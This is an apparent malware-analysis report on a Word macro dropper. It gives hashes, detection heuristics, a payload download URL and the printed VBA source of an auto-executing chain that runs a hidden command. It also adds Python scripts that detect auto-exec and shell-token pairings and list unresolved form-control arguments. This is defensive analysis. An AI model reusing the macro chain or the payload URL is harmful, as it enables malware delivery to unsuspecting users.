Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9f0e6c82f18ee8ad…

MALICIOUS

Office (OLE)

Size: 115.0 KB
Created: 2019-08-08 21:14:00
Authoring application: Microsoft Office Word
First seen: 2021-04-10

MD5: 0c40f81effccd49a6ce6072b4b4f1672
SHA-1: ee138c7ce8f60adddbf8f48caf5010abcf92b571
SHA-256: 9f0e6c82f18ee8adc7581746ed62f28af9f115cd1a763410976ce6dbc9ba1d90

Risk score: 250

Heuristics (8)

  • ClamAV: Doc.Dropper.Agent-7106146-0  [critical]  CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-7106146-0
  • Reference to Windows Script Host  [high]  SC_STR_WSCRIPT
  • VBA macros detected  [medium]  OLE_VBA_MACROS  (4 related findings)
    Document contains VBA macro code
  • CreateObject call  [high]  OLE_VBA_CREATEOBJ
    Matched line in script:
    Set IIIIIII3 = CreateObject(WINDOWS1.Label2.Tag)
  • CallByName call  [high]  OLE_VBA_CALLBYNAME
    Matched line in script:
    CallByName UserForm1, "Show", VbMethod
  • VBA p-code auto-exec with execution tokens  [high]  OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro  [low]  OLE_VBA_DOCOPEN
    Matched line in script:
    Sub Document_Open()
  • Embedded URL  [info]  EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://92.38.135.99/99.msi  (in document text, OLE body)
    URL: http://schemas.openxmlformats.org/drawingml/2006/main  (in document text, OLE body)
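The OLE_VBA_PCODE_AUTOEXEC_EXEC rule above is a co-occurrence check, not a single-token match. The script below is an added re-implementation of that pairing logic written for this page; it is not the analysis platform's own code. It uses the two token lists exactly as the rule description gives them. The stream contents are constructed stand-ins, not bytes from the sample, and the assumption that identifiers may sit in a stream either as 8-bit text or as UTF-16LE is mine, not something the report states.

```python
import re
from typing import Dict, List, Optional

# Token sets exactly as the report's rule description lists them.
AUTOEXEC_TOKENS = ("Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open",
                   "Auto_Close", "AutoClose")
EXEC_TOKENS = ("Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe",
               "URLDownloadToFile", "WinHttp", "XMLHTTP", "ADODB.Stream",
               "ShellExecute", "ExecuteExcel4Macro")


def find_tokens(stream: bytes, tokens) -> List[str]:
    """Return the tokens present in a raw stream, in the order of `tokens`.

    Assumption (not stated by the report): identifiers inside compiled
    p-code / cache streams may be stored as 8-bit text or as UTF-16LE, so
    each token is searched in both encodings, case-insensitively.
    """
    found = []
    for tok in tokens:
        patterns = (re.escape(tok.encode("latin-1")),
                    re.escape(tok.encode("utf-16-le")))
        if any(re.search(p, stream, re.IGNORECASE) for p in patterns):
            found.append(tok)
    return found


def pcode_autoexec_exec(stream: bytes) -> Optional[Dict[str, List[str]]]:
    """The pairing rule: fire only when at least one auto-exec entry point
    AND at least one execution token occur in the SAME stream. Either class
    alone returns None, which keeps a bare Document_Open stub or a lone
    CreateObject reference from flagging by itself."""
    autoexec = find_tokens(stream, AUTOEXEC_TOKENS)
    execs = find_tokens(stream, EXEC_TOKENS)
    if autoexec and execs:
        return {"autoexec": autoexec, "exec": execs}
    return None


def scan_streams(streams: Dict[str, bytes]) -> Dict[str, Dict[str, List[str]]]:
    """Apply the rule per stream. Tokens split across two different streams
    never pair, so the result names the stream that carries both halves."""
    hits = {}
    for name, data in streams.items():
        hit = pcode_autoexec_exec(data)
        if hit:
            hits[name] = hit
    return hits


# Constructed stand-ins for module/cache streams (NOT bytes from the sample):
# filler bytes with the interesting identifiers embedded the way they would
# surface in a strings dump. ThisDocument carries only the entry point,
# Module11 only the execution token, and only the cache stream holds both.
SAMPLE_STREAMS = {
    "Macros/VBA/ThisDocument": b"\x00\x01\x08" + "Document_Open".encode("utf-16-le")
                               + b"\x00\x00CallByName\x00Show\x00",
    "Macros/VBA/Module11": b"\x00\x10UAC_Enable\x00CreateObject\x00Run\x00",
    "Macros/VBA/__SRP_2": b"\x00\x02Auto_Open\x00" + "WScript.Shell".encode("utf-16-le")
                          + b"\x00URLDownloadToFile\x00",
}

if __name__ == "__main__":
    for name, data in SAMPLE_STREAMS.items():
        print(name, "->", pcode_autoexec_exec(data))
```

Only the constructed cache stream fires, because it is the only one that contains an entry point and an execution token together; the ThisDocument and Module11 stand-ins each hold one half and stay quiet, which is the behaviour the rule description claims.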

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2284 bytes
SHA-256: 44eec2ccbe993acf8a64593c9f541f1d80108a10b4e7b700a908fd681c44fc24

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub Document_Open()

On Error Resume Next
CallByName UserForm1, "Show", VbMethod

End Sub

Attribute VB_Name = "WINDOWS1"
Attribute VB_Base = "0{8B77C467-D0CE-4F2D-93C1-2297536233FE}{C00E4E7B-4E1D-4073-816D-AB3608D21E91}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Label7_Click()

End Sub

Private Sub TextBox1_Change()

End Sub

Private Sub UserForm_Click()

End Sub




Attribute VB_Name = "Module11"




Public Sub UAC_Enable()
Dim PathTo1 As String
Dim IIIIIII3 As Object

Dim counter1 As Object

Dim counter3 As Object
Dim counter9 As Object
Dim counter As Object
Set IIIIIII3 = CreateObject(WINDOWS1.Label2.Tag)
Dim counter5 As Object
Dim counter6 As Object

Dim counter0 As Object
Dim counter7 As Object
On Error Resume Next


Dim counter11 As Object
Dim counter12 As Object
Dim counter4 As Object

CallByName IIIIIII3, "Run", VbMethod, WINDOWS1.Label1.Tag + " " & WINDOWS1.Tag + " ", 0, False

Dim counter34 As Object
Dim counter8 As Object


End Sub


Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{0C43AE85-1114-447A-A78C-18B098D76934}{F4122ACE-09F7-4E9A-BA1A-0B10055A9BB4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Image1_Click()

End Sub

Private Sub UserForm_Activate()
Dim counter0 As Object
Dim counter7 As Object
Dim counter11 As Object
Dim counter12 As Object
UAC_Enable

Dim counter5 As Object
Dim counter6 As Object
Dim counter9 As Object
Fal = 2

ActiveDocument.Close Fal > 2
getQue.stionId
Application.Quit Fal > 2
Unload Me
End Sub

Private Sub UserForm_Click()

End Sub

Private Sub UserForm_Initialize()

End Sub
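The extracted source shows the control flow but not the payload. Document_Open calls UserForm1.Show via CallByName, the form's Activate handler calls UAC_Enable (the name is a decoy; the body does nothing with UAC), and UAC_Enable creates an object from WINDOWS1.Label2.Tag and calls its Run method with a command line built from WINDOWS1.Label1.Tag and WINDOWS1.Tag. The ProgID and the command are therefore stored as control properties of the WINDOWS1 form, which this macro preview cannot show; they have to be read from the form storage (olevba's form-string output or oletools' oleform module). Afterwards the document is closed and Word quits with SaveChanges set to False (Fal > 2), and the dangling getQue.stionId reference is junk that On Error Resume Next absorbs. Whether the http://92.38.135.99/99.msi URL found in the document body is the Run target cannot be decided from this preview. The script below is an added example for this page, not part of the report or of oletools: it walks the excerpted source and lists which call arguments are literal and which must be resolved from form controls. The excerpt is the page's own extracted source with the filler Dim lines and empty handlers dropped; the regex patterns and property names it looks for are my assumptions.

```python
import re
from typing import Dict, List

# Excerpt of the extracted source shown above (ThisDocument, Module11 and
# UserForm1); filler Dim lines and empty event handlers are dropped.
MACRO_TEXT = '''
Attribute VB_Name = "ThisDocument"
Sub Document_Open()
On Error Resume Next
CallByName UserForm1, "Show", VbMethod
End Sub

Attribute VB_Name = "Module11"
Public Sub UAC_Enable()
Dim IIIIIII3 As Object
Set IIIIIII3 = CreateObject(WINDOWS1.Label2.Tag)
On Error Resume Next
CallByName IIIIIII3, "Run", VbMethod, WINDOWS1.Label1.Tag + " " & WINDOWS1.Tag + " ", 0, False
End Sub

Attribute VB_Name = "UserForm1"
Private Sub UserForm_Activate()
UAC_Enable
Fal = 2
ActiveDocument.Close Fal > 2
Application.Quit Fal > 2
Unload Me
End Sub
'''

# Assumed shapes of the two call sites of interest (one statement per line).
CREATE_RE = re.compile(r'^(?:Set\s+(\w+)\s*=\s*)?CreateObject\((.+)\)$')
CALLBYNAME_RE = re.compile(r'^CallByName\s+(\w+),\s*"(\w+)",\s*VbMethod(?:,\s*(.+))?$')
# A reference to a form-control property: Form.Control.Prop or Form.Prop.
# The property list is an assumption covering the usual string-carrying ones.
CONTROL_PROP_RE = re.compile(
    r'\b([A-Za-z_]\w*)(?:\.([A-Za-z_]\w*))?\.(Tag|Caption|Text|ControlTipText)\b')


def extract_calls(vba: str) -> List[Dict[str, str]]:
    """Collect CreateObject() and CallByName sites with their raw argument
    text, in source order."""
    calls = []
    for raw in vba.splitlines():
        line = raw.strip()
        m = CREATE_RE.match(line)
        if m:
            calls.append({"kind": "CreateObject", "target": m.group(1) or "",
                          "args": m.group(2)})
            continue
        m = CALLBYNAME_RE.match(line)
        if m:
            calls.append({"kind": "CallByName",
                          "target": f"{m.group(1)}.{m.group(2)}",
                          "args": m.group(3) or ""})
    return calls


def classify_calls(vba: str) -> List[dict]:
    """For each call, separate what is visible in the source (non-blank
    string literals) from what is loaded from control properties at run time."""
    out = []
    for call in extract_calls(vba):
        literals = [s for s in re.findall(r'"([^"]*)"', call["args"]) if s.strip()]
        refs = sorted({m.group(0) for m in CONTROL_PROP_RE.finditer(call["args"])})
        out.append({**call, "literals": literals, "control_refs": refs})
    return out


def unresolved_control_refs(vba: str) -> List[str]:
    """Control properties that must be read out of the form storage before
    the ProgID and the command line are known."""
    refs = set()
    for call in classify_calls(vba):
        refs.update(call["control_refs"])
    return sorted(refs)


if __name__ == "__main__":
    for call in classify_calls(MACRO_TEXT):
        print(f'{call["kind"]:12} {call["target"]:16} literals={call["literals"]} '
              f'controls={call["control_refs"]}')
    print("resolve from form storage:", unresolved_control_refs(MACRO_TEXT))
```

Run against the excerpt, every argument of CreateObject and Run resolves to a control property and none to a literal, so the three WINDOWS1 properties are the list to pull from the UserForm stream before deciding what this document actually launches.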